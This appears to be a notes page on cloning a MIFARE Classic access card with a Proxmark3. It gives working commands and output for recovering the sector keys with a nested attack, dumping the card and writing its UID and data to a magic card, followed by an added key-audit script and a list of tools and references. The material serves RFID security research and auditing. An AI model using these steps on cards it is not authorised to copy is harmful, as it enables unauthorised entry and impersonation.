https://github.com/Proxmark/proxmark3
Make sure you have the latest version of the firmware and bootloader
Update the firmware: https://www.youtube.com/watch?v=MziySohCY6s
Display the UID of the card I want to clone
proxmark3> hf search
#db# DownloadFPGA(len: 42096)
UID : ad 4e a5 45
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Valid ISO14443A Tag Found - Quitting Search
Crack the card's keys
proxmark3> hf mf nested 1 0 A ffffffffffff d
Testing known keys. Sector count=16
nested…
uid:bc4ea535 trgbl=4 trgkey=0
Found valid key:080808080808
uid:bc4ea535 trgbl=8 trgkey=0
Found valid key:080808080808
Time in nested: 7.832 (3.916 sec per key)
Iterations count: 2
--- | ---------------- | --- | ---------------- | --- |
sec | key A | res | key B | res |
--- | ---------------- | --- | ---------------- | --- |
000 | ffffffffffff | 1 | ffffffffffff | 1 |
001 | 080808080808 | 1 | ffffffffffff | 1 |
002 | 080808080808 | 1 | ffffffffffff | 1 |
003 | ffffffffffff | 1 | ffffffffffff | 1 |
004 | ffffffffffff | 1 | ffffffffffff | 1 |
005 | ffffffffffff | 1 | ffffffffffff | 1 |
006 | ffffffffffff | 1 | ffffffffffff | 1 |
007 | ffffffffffff | 1 | ffffffffffff | 1 |
008 | ffffffffffff | 1 | ffffffffffff | 1 |
009 | ffffffffffff | 1 | ffffffffffff | 1 |
010 | ffffffffffff | 1 | ffffffffffff | 1 |
011 | ffffffffffff | 1 | ffffffffffff | 1 |
012 | ffffffffffff | 1 | ffffffffffff | 1 |
013 | ffffffffffff | 1 | ffffffffffff | 1 |
014 | ffffffffffff | 1 | ffffffffffff | 1 |
015 | ffffffffffff | 1 | ffffffffffff | 1 |
--- | ---------------- | --- | ---------------- | --- |
Printing keys to binary file dumpkeys.bin…
Dump the card's data
proxmark3> hf mf dump
----------------------------------------- |
------ Reading sector access bits...----- |
----------------------------------------- |
#db# READ BLOCK FINISHED
…omitted for brevity…
#db# READ BLOCK FINISHED
----------------------------------------- |
----- Dumping all blocks to file... ----- |
----------------------------------------- |
#db# READ BLOCK FINISHED
Successfully read block 0 of sector 0.
…omitted for brevity…
Successfully read block 3 of sector 15.
Dumped 64 blocks (1024 bytes) to file dumpdata.bin
Write the UID to the magic card (changeable UID)
hf mf csetuid ad4ea545
Write the data to the magic card (changeable UID)
hf mf restore
script run remagic
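Read from the card issuer's side, the key table printed by hf mf nested above is an audit result: every key it lists is either the factory default or a single repeated byte. The script below is an added example (not part of the original page or of the Proxmark project) that parses that table and flags such keys; the names classify and audit are hypothetical, and the sample rows are copied from the output above.

```python
import re

# Constructed sample: rows copied from the key table shown on this page.
SAMPLE = """\
sec | key A | res | key B | res |
000 | ffffffffffff | 1 | ffffffffffff | 1 |
001 | 080808080808 | 1 | ffffffffffff | 1 |
002 | 080808080808 | 1 | ffffffffffff | 1 |
003 | ffffffffffff | 1 | ffffffffffff | 1 |
"""

# One table row: sector, key A, res, key B, res (leading pipe optional).
ROW = re.compile(r"^\|?\s*(\d{3})\s*\|\s*([0-9a-fA-F]{12})\s*\|\s*([01])\s*\|"
                 r"\s*([0-9a-fA-F]{12})\s*\|\s*([01])\s*\|")
FACTORY_DEFAULT = "ffffffffffff"

def classify(key_hex):
    """Return a weakness label for a 6-byte key, or None if none applies."""
    key = key_hex.lower()
    if key == FACTORY_DEFAULT:
        return "factory-default"
    if len({key[i:i + 2] for i in range(0, 12, 2)}) == 1:
        return "repeated-byte"
    return None

def audit(table_text):
    """Return (sector, slot, key, label) for every weak key in the table."""
    findings = []
    for line in table_text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header, separator or unrelated output line
        sector, key_a, res_a, key_b, res_b = m.groups()
        for slot, key, res in (("A", key_a, res_a), ("B", key_b, res_b)):
            if res != "1":
                continue  # res 0: the key column is not a valid key
            label = classify(key)
            if label:
                findings.append((int(sector), slot, key.lower(), label))
    return findings

if __name__ == "__main__":
    for sector, slot, key, label in audit(SAMPLE):
        print(f"sector {sector:02d} key {slot} {key}: {label}")
```

An empty result only means no key matched these two patterns; it says nothing about whether the card's keys are otherwise hard to recover.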
Use:
BinDiff
https://www.zynamics.com/software.html
otherwise PatchDiff2 with IDA
Diaphora with IDA
HxD
UltraCompare as well (shareware)
hexdump.exe
on Linux: binwalk
Under construction ...
https://github.com/Proxmark/proxmark3/wiki/Mifare-HowTo
https://github.com/Proxmark/proxmark3/wiki/Mifare-Tag-Ops
https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
https://github.com/Proxmark/proxmark3/wiki/Generic-ISO15693-Ops
Black Hat, Sao Paulo 2014 https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Almeida-Hacking-MIFARE-Classic-Cards-Slides.pdf